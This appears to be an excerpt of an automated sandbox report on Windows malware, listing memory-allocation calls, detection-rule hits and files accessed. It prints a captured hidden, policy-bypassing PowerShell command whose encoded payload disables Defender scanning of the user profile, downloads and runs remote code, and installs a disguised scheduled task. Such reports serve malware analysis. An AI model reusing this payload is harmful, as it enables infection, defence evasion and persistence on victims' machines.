allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f05000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f06000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f07000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f08000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f09000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aa9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aaa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aad000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aae000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aaf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b43000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2732
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b44000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -ep bypass -w hidden -nop -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAOwANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwADsADQAKACQATABpAG4AawBPAG4AZQBSACAAPQAgACcASgBBAEIATQBBAEcAawBBAGIAZwBCAHIAQQBFAGsAQQBSAFEAQgBZAEEAQwBBAEEAUABRAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAGMAZwBCAGwAQQBHAE0AQQBiAHcAQgAyAEEARwBJAEEAWQBRAEIAegBBAEcAVQBBAEwAZwBCADAAQQBHADgAQQBjAEEAQQBuAEEARABzAEEARABRAEEASwBBAEMAUQBBAFEAdwBBADkAQQBHAGsAQQBkAHcAQgB5AEEAQwBBAEEASgBBAEIATQBBAEcAawBBAGIAZwBCAHIAQQBFAGsAQQBSAFEAQgBZAEEAQwBBAEEATABRAEIAVgBBAEgATQBBAFIAUQBCAEMAQQBHAEUAQQBVAHcAQgBKAEEARwBNAEEAVQBBAEIAQgBBAEgASQBBAGMAdwBCAHAAQQBFADQAQQBaAHcAQQBnAEEASAB3AEEAYQBRAEIAbABBAEgAZwBBAE8AdwBBAD0AJwA7AA0ACgAkAFQAIAA9ACAARwBlAHQALQBEAGEAdABlADsADQAKACQAVAAxACAAPQAgACQAVAAuAEEAZABkAE0AaQBuAHUAdABlAHMAKAA4ACkAOwANAAoAJABUAFIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdAAgACQAVAAxACAALQBEAGEAaQBsAHkADQAKACQAUABTACAAPQAgACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACIAXABTAHkAcwB0AGUAbQAzADIAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAOwANAAoAJABBACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACQAUABTACAALQBBAHIAZwB1AG0AZQBuAHQAIAAiAC0AZQBwACAAYgB5AHAAYQBzAHMAIAAtAHcAIABoAGkAZABkAGUAbgAgAC0AbgBvAHAAIAAtAGUAbgBjACAAJABMAGkAbgBrAE8AbgBlAFIAIgA7AA0ACgAkAFAAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFAAcgBpAG4AYwBpAHAAYQBsACAALQBVAHMAZQByACAAJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQAgAC0ATABvAGcAbwBuAFQAeQBwAGUAIABTADQAVQAgAC0AUgB1AG4ATABlAHYAZQBsACAASABpAGcAaABlAHMAdAANAAoAJABTACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAE0AdQBsAHQAaQBwAGwAZQBJAG4AcwB0AGEAbgBjAGUAcwAgAFAAYQByAGEAbABsAGUAbAANAAoAJABUAE4AIAA9ACAAIgBHAEQAcgBpAHYAZQAgAEIAYQBjAGsAdQBwACAAUwB5AG4AYwAiADsADQAKAFUAbgByAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAFQATgAgAC0AQwBvAG4AZgBpAHIAbQA6ACQARgBhAGwAcwBlADsADQAKAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAFQAYQBzAGsATgBhAG0AZQAgACQAVABOACAALQBUAHIAaQBnAGcAZQByACAAJABUAFIAIAAtAEEAYwB0AGkAbwBuACAAJABBACAALQBTAGUAdAB0AGkAbgBnAHMAIAAkAFMAIAAtAFAAcgBpAG4AYwBpAHAAYQBsACAAJABQADsA
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communications over P2P network rule Network_P2P_Win
description Communication using DGA rule Network_DGA
description Steal credential rule local_credential_Steal
description Match Windows Http API call rule Str_Win32_Http_API
description Escalate priviledges rule Escalate_priviledges
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Take ScreenShot rule ScreenShot
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description File Downloader rule Network_Downloader
option -ep bypass value Attempts to bypass execution policy
option -nop value Does not load current user profile
option -w hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe